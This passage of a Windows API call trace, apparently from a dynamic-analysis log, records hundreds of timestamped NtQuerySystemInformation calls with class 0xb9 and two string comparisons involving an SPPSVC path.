NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0226.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0226.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0226.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0226.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0226.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0226.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0226.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0226.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0226.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0226.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0226.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x28, ResultLength=0x0) [0226.914] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0226.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0226.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0226.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0226.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0226.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0226.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0226.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0226.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0226.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x28, ResultLength=0x0) [0226.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x28, ResultLength=0x0) [0226.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0226.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x20, ResultLength=0x0) [0226.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0226.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x20, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0226.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0226.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x28, ResultLength=0x0) [0226.924] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0226.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0226.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x50, ResultLength=0x0) [0226.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0226.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0226.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0226.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0226.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0226.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0226.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x28, ResultLength=0x0) [0226.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x28, ResultLength=0x0) [0226.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0226.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x20, ResultLength=0x0) [0226.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0226.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x38, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x20, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0226.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0226.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0226.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x28, ResultLength=0x0) [0226.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) 